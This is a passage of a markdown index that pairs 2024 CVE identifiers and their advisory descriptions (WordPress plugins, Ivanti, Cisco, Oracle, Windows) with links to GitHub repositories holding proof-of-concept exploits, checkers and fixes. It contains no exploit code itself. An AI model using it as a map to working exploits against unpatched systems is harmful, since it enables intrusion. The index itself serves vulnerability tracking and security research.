- [turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker](https://github.com/turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker)
- [sms2056/CVE-2024-6387](https://github.com/sms2056/CVE-2024-6387)
- [invaderslabs/regreSSHion-CVE-2024-6387-](https://github.com/invaderslabs/regreSSHion-CVE-2024-6387-)
- [lala-amber/CVE-2024-6387](https://github.com/lala-amber/CVE-2024-6387)
- [4lxprime/regreSSHive](https://github.com/4lxprime/regreSSHive)
- [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check)
- [0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh)
- [sardine-web/CVE-2024-6387-template](https://github.com/sardine-web/CVE-2024-6387-template)
- [imv7/CVE-2024-6387](https://github.com/imv7/CVE-2024-6387)
- [SiberianHacker/CVE-2024-6387-Finder](https://github.com/SiberianHacker/CVE-2024-6387-Finder)
- [dgicloud/patch_regreSSHion](https://github.com/dgicloud/patch_regreSSHion)
- [azurejoga/CVE-2024-6387-how-to-fix](https://github.com/azurejoga/CVE-2024-6387-how-to-fix)
- [asterictnl-lvdw/CVE-2024-6387](https://github.com/asterictnl-lvdw/CVE-2024-6387)
- [vkaushik-chef/regreSSHion](https://github.com/vkaushik-chef/regreSSHion)
- [dgourillon/mitigate-CVE-2024-6387](https://github.com/dgourillon/mitigate-CVE-2024-6387)
- [mrmtwoj/CVE-2024-6387](https://github.com/mrmtwoj/CVE-2024-6387)
- [filipi86/CVE-2024-6387-Vulnerability-Checker](https://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker)
- [kubota/CVE-2024-6387-Vulnerability-Checker](https://github.com/kubota/CVE-2024-6387-Vulnerability-Checker)
- [DimaMend/cve-2024-6387-poc](https://github.com/DimaMend/cve-2024-6387-poc)
- [ThemeHackers/CVE-2024-6387](https://github.com/ThemeHackers/CVE-2024-6387)
- [Sibijo/mitigate_ssh](https://github.com/Sibijo/mitigate_ssh)
- [Passyed/regreSSHion-Fix](https://github.com/Passyed/regreSSHion-Fix)
- [k4t3pr0/CVE-2024-6387-Check](https://github.com/k4t3pr0/CVE-2024-6387-Check)
- [dream434/CVE-2024-6387](https://github.com/dream434/CVE-2024-6387)
- [ThatNotEasy/CVE-2024-6387](https://github.com/ThatNotEasy/CVE-2024-6387)
- [prelearn-code/CVE-2024-6387](https://github.com/prelearn-code/CVE-2024-6387)
- [l-urk/CVE-2024-6387](https://github.com/l-urk/CVE-2024-6387)
- [alex14324/ssh_poc2024](https://github.com/alex14324/ssh_poc2024)
- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker)
- [s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH](https://github.com/s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH)
- [almogopp/OpenSSH-CVE-2024-6387-Fix](https://github.com/almogopp/OpenSSH-CVE-2024-6387-Fix)
- [HadesNull123/CVE-2024-6387_Check](https://github.com/HadesNull123/CVE-2024-6387_Check)
- [identity-threat-labs/CVE-2024-6387-Vulnerability-Checker](https://github.com/identity-threat-labs/CVE-2024-6387-Vulnerability-Checker)
- [identity-threat-labs/Article-RegreSSHion-CVE-2024-6387](https://github.com/identity-threat-labs/Article-RegreSSHion-CVE-2024-6387)

### CVE-2024-6529 (2024-08-01)

The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

- [Abdurahmon3236/CVE-2024-6529](https://github.com/Abdurahmon3236/CVE-2024-6529)

### CVE-2024-6536 (2024-07-30)

The Zephyr Project Manager WordPress plugin before 3.3.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors and admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

- [apena-ba/CVE-2024-6536](https://github.com/apena-ba/CVE-2024-6536)

### CVE-2024-6592
- [RedTeamPentesting/watchguard-sso-client](https://github.com/RedTeamPentesting/watchguard-sso-client)

### CVE-2024-6624 (2024-07-11)

The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed.

- [RandomRobbieBF/CVE-2024-6624](https://github.com/RandomRobbieBF/CVE-2024-6624)

### CVE-2024-6670 (2024-08-29)

In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the user's encrypted password.

- [sinsinology/CVE-2024-6670](https://github.com/sinsinology/CVE-2024-6670)

### CVE-2024-6768 (2024-08-12)

A Denial of Service in CLFS.sys in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated low-privilege user to cause a Blue Screen of Death via a forced call to the KeBugCheckEx function.

- [fortra/CVE-2024-6768](https://github.com/fortra/CVE-2024-6768)

### CVE-2024-6769
- [fortra/CVE-2024-6769](https://github.com/fortra/CVE-2024-6769)

### CVE-2024-6778 (2024-07-16)

Race in DevTools in Google Chrome prior to 126.0.6478.182 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High)

- [ading2210/CVE-2024-6778-POC](https://github.com/ading2210/CVE-2024-6778-POC)
- [r00tjunip3r1/POC-CVE-2024-6778](https://github.com/r00tjunip3r1/POC-CVE-2024-6778)

### CVE-2024-6782 (2024-08-06)

Improper access control in Calibre 6.9.0 ~ 7.14.0 allows unauthenticated attackers to achieve remote code execution.

- [zangjiahe/CVE-2024-6782](https://github.com/zangjiahe/CVE-2024-6782)
- [jdpsl/CVE-2024-6782](https://github.com/jdpsl/CVE-2024-6782)
- [R4idB0Y/CVE-2024-6782-PoC](https://github.com/R4idB0Y/CVE-2024-6782-PoC)

### CVE-2024-6788 (2024-08-13)

A remote unauthenticated attacker can use the firmware update feature on the LAN interface of the device to reset the password for the predefined, low-privileged user “user-app” to the default password.

- [zetraxz/CVE-2024-6788](https://github.com/zetraxz/CVE-2024-6788)

### CVE-2024-7029 (2024-08-02)

Commands can be injected over the network and executed without authentication.

- [bigherocenter/CVE-2024-7029-EXPLOIT](https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT)
- [ebrasha/CVE-2024-7029](https://github.com/ebrasha/CVE-2024-7029)
- [geniuszlyy/CVE-2024-7029](https://github.com/geniuszlyy/CVE-2024-7029)

### CVE-2024-7094 (2024-08-13)

The JS Help Desk – The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added.

- [nastar-id/CVE-2024-7094](https://github.com/nastar-id/CVE-2024-7094)

### CVE-2024-7120 (2024-07-26)

A critical vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. Affected is an unknown code block of the file list_base_config.php of the component Web Interface. Manipulation of the argument template with unknown data can lead to an os command injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [fa-rrel/CVE-2024-7120](https://github.com/fa-rrel/CVE-2024-7120)

### CVE-2024-7135 (2024-07-31)

The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

- [RandomRobbieBF/CVE-2024-7135](https://github.com/RandomRobbieBF/CVE-2024-7135)

### CVE-2024-7313 (2024-08-26)

The Shield Security WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

- [Wayne-Ker/CVE-2024-7313](https://github.com/Wayne-Ker/CVE-2024-7313)

### CVE-2024-7339 (2024-08-01)

A problematic vulnerability was found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T. Affected is an unknown function of the file /queryDevInfo. Manipulation with unknown data can lead to an information disclosure vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [RevoltSecurities/CVE-2024-7339](https://github.com/RevoltSecurities/CVE-2024-7339)

### CVE-2024-7479
- [PeterGabaldon/CVE-2024-7479_CVE-2024-7481](https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481)

### CVE-2024-7514
- [RandomRobbieBF/CVE-2024-7514](https://github.com/RandomRobbieBF/CVE-2024-7514)

### CVE-2024-7593 (2024-08-13)

Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.

- [rxerium/CVE-2024-7593](https://github.com/rxerium/CVE-2024-7593)
- [D3N14LD15K/CVE-2024-7593_PoC_Exploit](https://github.com/D3N14LD15K/CVE-2024-7593_PoC_Exploit)
- [skyrowalker/CVE-2024-7593](https://github.com/skyrowalker/CVE-2024-7593)

### CVE-2024-7646 (2024-08-16)

A security issue was discovered in ingress-nginx where an actor with permission to create Ingress objects (in the `networking.k8s.io` or `extensions` API group) can bypass annotation validation to inject arbitrary commands and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.

- [r0binak/CVE-2024-7646](https://github.com/r0binak/CVE-2024-7646)
- [dovics/cve-2024-7646](https://github.com/dovics/cve-2024-7646)

### CVE-2024-7703 (2024-08-17)

The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

- [lfillaz/CVE-2024-7703](https://github.com/lfillaz/CVE-2024-7703)

### CVE-2024-7854 (2024-08-21)

The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [RandomRobbieBF/CVE-2024-7854](https://github.com/RandomRobbieBF/CVE-2024-7854)

### CVE-2024-7856 (2024-08-29)

The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted.

- [l8BL/CVE-2024-7856](https://github.com/l8BL/CVE-2024-7856)

### CVE-2024-7928 (2024-08-19)

A problematic vulnerability was discovered in FastAdmin up to 1.3.3.20220121. This affects an unknown function of the file /index/ajax/lang. Manipulation of the argument lang with unknown data can lead to a path traversal vulnerability. The attack can be launched over the network. The exploit is publicly available. Upgrading to version 1.3.4.20220530 can fix this issue. It is recommended to upgrade the affected component.

- [bigb0x/CVE-2024-7928](https://github.com/bigb0x/CVE-2024-7928)
- [fa-rrel/CVE-2024-7928](https://github.com/fa-rrel/CVE-2024-7928)
- [wh6amiGit/CVE-2024-7928](https://github.com/wh6amiGit/CVE-2024-7928)
- [th3gokul/CVE-2024-7928](https://github.com/th3gokul/CVE-2024-7928)

### CVE-2024-7954 (2024-08-23)

The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.

- [Chocapikk/CVE-2024-7954](https://github.com/Chocapikk/CVE-2024-7954)
- [bigb0x/CVE-2024-7954](https://github.com/bigb0x/CVE-2024-7954)
- [fa-rrel/CVE-2024-7954-RCE](https://github.com/fa-rrel/CVE-2024-7954-RCE)
- [TheCyberguy-17/RCE_CVE-2024-7954](https://github.com/TheCyberguy-17/RCE_CVE-2024-7954)
- [MuhammadWaseem29/RCE-CVE-2024-7954](https://github.com/MuhammadWaseem29/RCE-CVE-2024-7954)

### CVE-2024-7965 (2024-08-21)

Inappropriate implementation in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [bi-zone/CVE-2024-7965](https://github.com/bi-zone/CVE-2024-7965)

### CVE-2024-8190 (2024-09-10)

An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.

- [horizon3ai/CVE-2024-8190](https://github.com/horizon3ai/CVE-2024-8190)

### CVE-2024-8275
- [p33d/CVE-2024-8275](https://github.com/p33d/CVE-2024-8275)

### CVE-2024-8277 (2024-09-11)

The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as a user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.

- [PolatBey/CVE-2024-8277](https://github.com/PolatBey/CVE-2024-8277)

### CVE-2024-8349
- [karlemilnikka/CVE-2024-8349-and-CVE-2024-8350](https://github.com/karlemilnikka/CVE-2024-8349-and-CVE-2024-8350)

### CVE-2024-8353
- [EQSTLab/CVE-2024-8353](https://github.com/EQSTLab/CVE-2024-8353)

### CVE-2024-8484
- [RandomRobbieBF/CVE-2024-8484](https://github.com/RandomRobbieBF/CVE-2024-8484)

### CVE-2024-8504 (2024-09-10)

An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.

- [Chocapikk/CVE-2024-8504](https://github.com/Chocapikk/CVE-2024-8504)
- [havokzero/ViciDial](https://github.com/havokzero/ViciDial)

### CVE-2024-8517 (2024-09-06)

SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.

- [Chocapikk/CVE-2024-8517](https://github.com/Chocapikk/CVE-2024-8517)

### CVE-2024-8522 (2024-09-12)

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [Avento/CVE-2024-8522](https://github.com/Avento/CVE-2024-8522)

### CVE-2024-8529 (2024-09-12)

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [RandomRobbieBF/CVE-2024-8529](https://github.com/RandomRobbieBF/CVE-2024-8529)

### CVE-2024-8698
- [huydoppaz/CVE-2024-8698-POC](https://github.com/huydoppaz/CVE-2024-8698-POC)

### CVE-2024-8752 (2024-09-16)

The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.

- [D3anSPGDMS/CVE-2024-8752](https://github.com/D3anSPGDMS/CVE-2024-8752)

### CVE-2024-8868 (2024-09-15)

A vulnerability was found in code-projects Crud Operation System 1.0. It has been rated as critical. Affected is unknown code of the file savedata.php. Manipulation of the argument sname with unknown data can lead to a sql injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [M0onc/CVE-2024-8868](https://github.com/M0onc/CVE-2024-8868)

### CVE-2024-8949
- [fa-rrel/CVE-2024-8949-POC](https://github.com/fa-rrel/CVE-2024-8949-POC)

### CVE-2024-9014
- [EQSTLab/CVE-2024-9014](https://github.com/EQSTLab/CVE-2024-9014)

### CVE-2024-9061
- [RandomRobbieBF/CVE-2024-9061](https://github.com/RandomRobbieBF/CVE-2024-9061)

### CVE-2024-9106
- [RandomRobbieBF/CVE-2024-9106](https://github.com/RandomRobbieBF/CVE-2024-9106)

### CVE-2024-9162
- [d0n601/CVE-2024-9162](https://github.com/d0n601/CVE-2024-9162)

### CVE-2024-9166
- [Andrysqui/CVE-2024-9166](https://github.com/Andrysqui/CVE-2024-9166)

### CVE-2024-9224
- [RandomRobbieBF/CVE-2024-9224](https://github.com/RandomRobbieBF/CVE-2024-9224)

### CVE-2024-9234
- [RandomRobbieBF/CVE-2024-9234](https://github.com/RandomRobbieBF/CVE-2024-9234)

### CVE-2024-9264
- [nollium/CVE-2024-9264](https://github.com/nollium/CVE-2024-9264)
- [z3k0sec/File-Read-CVE-2024-9264](https://github.com/z3k0sec/File-Read-CVE-2024-9264)
- [zgimszhd61/CVE-2024-9264](https://github.com/zgimszhd61/CVE-2024-9264)
- [z3k0sec/CVE-2024-9264-RCE-Exploit](https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit)
- [PunitTailor55/Grafana-CVE-2024-9264](https://github.com/PunitTailor55/Grafana-CVE-2024-9264)
- [zgimszhd61/CVE-2024-9264-RCE](https://github.com/zgimszhd61/CVE-2024-9264-RCE)

### CVE-2024-9441
- [adhikara13/CVE-2024-9441](https://github.com/adhikara13/CVE-2024-9441)
- [p33d/CVE-2024-9441](https://github.com/p33d/CVE-2024-9441)

### CVE-2024-9464
- [horizon3ai/CVE-2024-9464](https://github.com/horizon3ai/CVE-2024-9464)

### CVE-2024-9465
- [horizon3ai/CVE-2024-9465](https://github.com/horizon3ai/CVE-2024-9465)
- [mustafaakalin/CVE-2024-9465](https://github.com/mustafaakalin/CVE-2024-9465)

### CVE-2024-9466
- [holypryx/CVE-2024-9466](https://github.com/holypryx/CVE-2024-9466)

### CVE-2024-9570
- [dylvie/CVE-2024-9570_D-Link-DIR-619L-bof](https://github.com/dylvie/CVE-2024-9570_D-Link-DIR-619L-bof)

### CVE-2024-9593
- [RandomRobbieBF/CVE-2024-9593](https://github.com/RandomRobbieBF/CVE-2024-9593)

### CVE-2024-9680
- [tdonaworth/Firefox-CVE-2024-9680](https://github.com/tdonaworth/Firefox-CVE-2024-9680)

### CVE-2024-9707
- [RandomRobbieBF/CVE-2024-9707](https://github.com/RandomRobbieBF/CVE-2024-9707)

### CVE-2024-9796
- [RandomRobbieBF/CVE-2024-9796](https://github.com/RandomRobbieBF/CVE-2024-9796)

### CVE-2024-9821
- [RandomRobbieBF/CVE-2024-9821](https://github.com/RandomRobbieBF/CVE-2024-9821)

### CVE-2024-9954
- [zetraxz/CVE-2024-9954](https://github.com/zetraxz/CVE-2024-9954)
- [famixcm/CVE-2024-9954](https://github.com/famixcm/CVE-2024-9954)

### CVE-2024-9955
- [amfg145/CVE-2024-9955-POC](https://github.com/amfg145/CVE-2024-9955-POC)
- [ShawtyTwo/CVE-2024-9955-POC](https://github.com/ShawtyTwo/CVE-2024-9955-POC)

### CVE-2024-10140
- [holypryx/CVE-2024-10140](https://github.com/holypryx/CVE-2024-10140)

### CVE-2024-10354
- [K1nako0/CVE-2024-10354](https://github.com/K1nako0/CVE-2024-10354)

### CVE-2024-10355
- [K1nako0/CVE-2024-10355](https://github.com/K1nako0/CVE-2024-10355)

### CVE-2024-10410
- [K1nako0/CVE-2024-10410](https://github.com/K1nako0/CVE-2024-10410)

### CVE-2024-10448
- [bevennyamande/CVE-2024-10448](https://github.com/bevennyamande/CVE-2024-10448)

### CVE-2024-10557
- [bevennyamande/CVE-2024-10557](https://github.com/bevennyamande/CVE-2024-10557)

### CVE-2024-12883
- [mhtsec/cve-2024-12883](https://github.com/mhtsec/cve-2024-12883)

### CVE-2024-20017 (2024-03-04)

In wlan service, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00350938; Issue ID: MSV-1132.

- [mellow-hype/cve-2024-20017](https://github.com/mellow-hype/cve-2024-20017)

### CVE-2024-20291 (2024-02-28)

A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.

This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.

- [Instructor-Team8/CVE-2024-20291-POC](https://github.com/Instructor-Team8/CVE-2024-20291-POC)

### CVE-2024-20338 (2024-03-06)

A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.

This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges.

- [annmuor/CVE-2024-20338](https://github.com/annmuor/CVE-2024-20338)

### CVE-2024-20356 (2024-04-24)

A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to elevate their privileges to root.

- [nettitude/CVE-2024-20356](https://github.com/nettitude/CVE-2024-20356)
- [SherllyNeo/CVE_2024_20356](https://github.com/SherllyNeo/CVE_2024_20356)

### CVE-2024-20404 (2024-06-05)

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.

This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device.

- [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404)

### CVE-2024-20405 (2024-06-05)

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability.

This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device.

- [AbdElRahmanEzzat1995/CVE-2024-20405](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20405)

### CVE-2024-20467
- [saler-cve/PoC-Exploit-CVE-2024-20467](https://github.com/saler-cve/PoC-Exploit-CVE-2024-20467)

### CVE-2024-20656 (2024-01-09)

Visual Studio Elevation of Privilege Vulnerability

- [Wh04m1001/CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656)

### CVE-2024-20666 (2024-01-09)

BitLocker Security Feature Bypass Vulnerability

- [nnotwen/Script-For-CVE-2024-20666](https://github.com/nnotwen/Script-For-CVE-2024-20666)
- [invaderslabs/CVE-2024-20666](https://github.com/invaderslabs/CVE-2024-20666)

### CVE-2024-20696 (2024-01-09)

Windows libarchive Remote Code Execution Vulnerability

- [clearbluejar/CVE-2024-20696](https://github.com/clearbluejar/CVE-2024-20696)

### CVE-2024-20698 (2024-01-09)

Windows Kernel Elevation of Privilege Vulnerability

- [RomanRybachek/CVE-2024-20698](https://github.com/RomanRybachek/CVE-2024-20698)

### CVE-2024-20746 (2024-03-18)

Premiere Pro versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [200101WhoAmI/CVE-2024-20746](https://github.com/200101WhoAmI/CVE-2024-20746)

### CVE-2024-20767 (2024-03-18)

ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

- [yoryio/CVE-2024-20767](https://github.com/yoryio/CVE-2024-20767)
- [m-cetin/CVE-2024-20767](https://github.com/m-cetin/CVE-2024-20767)
- [Chocapikk/CVE-2024-20767](https://github.com/Chocapikk/CVE-2024-20767)
- [Praison001/CVE-2024-20767-Adobe-ColdFusion](https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion)

### CVE-2024-20931 (2024-02-17)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [GlassyAmadeus/CVE-2024-20931](https://github.com/GlassyAmadeus/CVE-2024-20931)
- [Leocodefocus/CVE-2024-20931-Poc](https://github.com/Leocodefocus/CVE-2024-20931-Poc)
- [ATonysan/CVE-2024-20931_weblogic](https://github.com/ATonysan/CVE-2024-20931_weblogic)
- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931)

### CVE-2024-21006 (2024-04-16)

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

- [momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006)
- [lightr3d/CVE-2024-21006_jar](https://github.com/lightr3d/CVE-2024-21006_jar)
- [dadvlingd/CVE-2024-21006](https://github.com/dadvlingd/CVE-2024-21006)

### CVE-2024-21107 (2024-04-16)

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

- [Alaatk/CVE-2024-21107](https://github.com/Alaatk/CVE-2024-21107)

### CVE-2024-21111 (2024-04-16)

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

- [mansk1es/CVE-2024-21111](https://github.com/mansk1es/CVE-2024-21111)
- [10cks/CVE-2024-21111-del](https://github.com/10cks/CVE-2024-21111-del)
- [x0rsys/CVE-2024-21111](https://github.com/x0rsys/CVE-2024-21111)

### CVE-2024-21305 (2024-01-09)

Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability

- [tandasat/CVE-2024-21305](https://github.com/tandasat/CVE-2024-21305)

### CVE-2024-21306 (2024-01-09)

Microsoft Bluetooth Driver Spoofing Vulnerability

- [d4rks1d33/C-PoC-for-CVE-2024-21306](https://github.com/d4rks1d33/C-PoC-for-CVE-2024-21306)
- [PhucHauDeveloper/BadBlue](https://github.com/PhucHauDeveloper/BadBlue)

### CVE-2024-21320 (2024-01-09)

Windows Themes Spoofing Vulnerability

- [sxyrxyy/CVE-2024-21320-POC](https://github.com/sxyrxyy/CVE-2024-21320-POC)

### CVE-2024-21338 (2024-02-13)

Windows Kernel Elevation of Privilege Vulnerability

- [hakaioffsec/CVE-2024-21338](https://github.com/hakaioffsec/CVE-2024-21338)
- [UMU618/CVE-2024-21338](https://github.com/UMU618/CVE-2024-21338)
- [varwara/CVE-2024-21338](https://github.com/varwara/CVE-2024-21338)
- [Zombie-Kaiser/CVE-2024-21338-x64-build-](https://github.com/Zombie-Kaiser/CVE-2024-21338-x64-build-)
- [tykawaii98/CVE-2024-21338_PoC](https://github.com/tykawaii98/CVE-2024-21338_PoC)
- [Crowdfense/CVE-2024-21338](https://github.com/Crowdfense/CVE-2024-21338)

### CVE-2024-21345 (2024-02-13)

Windows Kernel Elevation of Privilege Vulnerability

